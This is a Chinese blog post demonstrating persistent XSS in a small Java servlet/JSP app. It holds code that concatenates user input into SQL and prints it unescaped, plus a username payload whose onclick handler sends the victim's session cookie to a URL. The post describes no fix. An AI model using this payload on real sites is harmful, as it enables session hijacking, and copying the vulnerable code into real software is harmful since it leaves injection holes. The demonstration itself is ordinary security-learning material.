XSS跨站攻击3

最新推荐文章于 2024-03-08 19:24:54 发布
最新推荐文章于 2024-03-08 19:24:54 发布
阅读量852 收藏
点赞数
分类专栏: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9174165
版权

花了点时间做了一个注册用户的页面和显示用户的页面,还有两个httpservlet。

注册用户的代码:

<form action="register">
	username:<input type="text" name="username"><br>
	password:<input type="password" name="password"><br>
	phone:<input type="text" name="phone"><br>
	<input type="submit" value="register">
</form>

	@Override
	protected void doPost(HttpServletRequest req, HttpServletResponse resp)
			throws ServletException, IOException {
		String username = req.getParameter("username");
		String password = req.getParameter("password");
		String phone = req.getParameter("phone");
		
		String insertSQL = "insert into tb_user values ('" + username + "', '" + password + "', '" + phone + "')";
		DBUtil.executeSQL(insertSQL);
	}

显示用户的代码: 

	@Override
	protected void doPost(HttpServletRequest req, HttpServletResponse resp)
			throws ServletException, IOException {
		String selectSQL = "select username, password, phone from tb_user";
		
		Statement stmt = null;
		ResultSet rs = null;
		List<User> userList = new ArrayList<User>();
		try {
			stmt = DBUtil.createStatement();
			rs = stmt.executeQuery(selectSQL);
			while (rs.next()) {
				User user = new User(rs.getString(1), rs.getString(2), rs.getString(3));
				userList.add(user);
			}
		} catch (SQLException e) {
			throw new ServletException(e);
		} finally {
			DBUtil.closeResultSet(rs);
			DBUtil.closeStatement(stmt);
		}
		
		req.setAttribute("user_list", userList);
		req.getRequestDispatcher("showuser.jsp").forward(req, resp);
	}

<body>
	<%
		List<User> userList = (List<User>) request.getAttribute("user_list");

		for (int i = 0; i < userList.size(); i++) {
			User user = userList.get(i);
	%>
	<div>
		username:<%=user.getUsername() %><br>
		phone:<%=user.getPhone() %><br>
	</div>
	<%
		}
	%>
</body>

然后注册了一个合法的用户和一个非法的用户,非法用户如下:

username为

<a href=# οnclick=\"document.location=\'index.jsp?c=\'+escape\(document.cookie\)\;\">Hacker</a>
在显示用户的页面上显示为:


看到用户Hacker是带链接的,然后点击一下,显示:




看到浏览器的地址栏里,参数是JSESSIONID%3D7B0C11B6826B67D3E4D9967837F2C48D,session的id是7B0C11B6826B67D3E4D9967837F2C48D。

这种XSS属于Persistent XSS。


获得session id的方法:

<%@ page language="java" contentType="text/html; charset=UTF-8"
	pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
session id:<%=session.getId()%><br>
<script type="text/javascript">
document.write(escape(document.cookie));
</script>
</body>
</html>

显示: 

session id:9A7A5F89EBFC598FEC18FC003706A899
JSESSIONID%3D9A7A5F89EBFC598FEC18FC003706A899


feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS跨站脚本攻击攻击与防御
zhaohong_bo的专栏
05-21 1083
一、 XSS攻击原理 XSS原称为CSS(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以改称为XSS(X一般有未知的含义,还有扩展的含义)。XSS攻击涉及到三方:攻击者,用户,web server。用户是通过浏览器来访问web server上的网页,XSS攻击就是攻击者通过各种办法,在用户访问的网页中插入自己的脚本,让其在用户...
XSS跨站脚本攻击
01-27
3. DOM-Based XSS(基于DOM的跨站脚本攻击):这种类型的XSS不是通过服务器端的HTTP响应注入,而是利用JavaScript动态生成页面时,对用户可控的DOM节点进行不当处理造成的。攻击者可以通过修改URL参数来改变DOM结构...
XSS跨站攻击介绍
m0_54020412的博客
06-15 1895
本文介绍了XSS跨站攻击方式及演示
XSS跨站脚本攻击及防护
weixin_62707591的博客
06-18 3185
XSS又叫CSS),即跨站脚本攻击,是最常见的 Web 应用程序安全漏洞之一。在绝大多数网络攻击中都是把XSS作为漏洞链中的第一环,通过XSS,黑客可以得到的最直接利益就是拿到用户浏览器的 cookie,从而变相盗取用户的账号密码,进而非授权的获取关键的隐私信息。XSS攻击是一种客户端访问嵌入有恶意脚本代码的Web页面,从而盗取信息、利用身份等的一种攻击行为。XSS属于客户端攻击受害者最终是用户。XSS的传播性极强,由于 web 的特点是轻量级灵活性高。
xss跨站脚本攻击总结
太阳照耀我走四方
07-16 2104
svg onload="alert(1)"> //onerror 当加载文档或图像时发生某个错误无的弹窗语句onclick="alert(1)" //鼠标单击事件onmouseover="alert(1)" //鼠标悬浮事件最后还有很多的绕过姿势,推荐博客cookie:存储本地 存活时间较长 小中型session: 会话 存储服务器 存活时间较短 大型企业使用。
xss跨站攻击
qq_63267612的博客
08-21 296
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户目的。流量劫持获取用户cookie信息,盗取账号篡改、删除页面信息(钓鱼)配合CSRF攻击,实施进一步攻击XSS分类。
XSS跨站脚本攻击详解(包括攻击方式和防御方式)
热门推荐
数据知道的博客
08-29 3万+
人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSXSS(Cross Site Scripting)跨站脚本攻击,是一种网站应用程序的安全漏洞攻击XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。...
XSS跨站脚本攻击
个人学习参考
03-08 875
本篇文章仅作为本人学习笔记。
5.6 XSS跨站脚本攻击
qq_55202378的博客
08-05 725
XSS DVWA
XSS跨站脚本攻击漏洞
追求卓越
12-23 1140
XSS跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者在网站中植入恶意的脚本代码,当其他用户访问该网站时,这些脚本代码会在用户的浏览器中执行。这可能会导致严重的安全后果,比如窃取用户的敏感信息,欺骗用户,或者在用户的浏览器中执行恶意操作。XSS漏洞通常出现在网站中输入数据未经过滤或者不当过滤的情况下,攻击者可以通过向网站发送带有恶意脚本的数据,使得脚本在用户的浏览器中执行。在反射型XSS中,攻击者向网站发送一个带有恶意脚本的URL,当其他用户点击该URL时,恶意脚本就会在用户的浏览器中执行。
XSS跨站脚本攻击剖析与防御.pdf
05-16
XSS跨站脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
XSS跨站攻击
天元喜羊羊的博客
06-24 1577
jsp代码: <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> Insert title here <% String name = request.getParameter("name"); %> Welcome 在IE6上测试: 参数变
Man Left in the Middle Attack Method中间人攻击
天元喜羊羊的博客
06-27 1164
操作如下: root@bt:/pentest/exploits/set# ./set :::=== :::===== :::==== ::: ::: :::==== ===== ====== ===
XSS跨站攻击2
天元喜羊羊的博客
06-25 868
JSP代码: <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> Insert title here <% String name = request.getParameter("name"); %> Welcome Click to Download
大数据技术分享 Spark技术讲座 荷兰铁路的预测性维护 共32页.pdf
最新发布
07-18
大数据技术分享 Spark技术讲座 荷兰铁路的预测性维护 共32页.pdf
理解与防范XSS跨站攻击:从基础到实战
XSS跨站攻击课程.pdf” XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它发生在Web应用程序中,由于程序未能充分验证和过滤用户提供的输入,导致恶意脚本能够在用户浏览器中执行。这门课程全面覆盖了XSS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值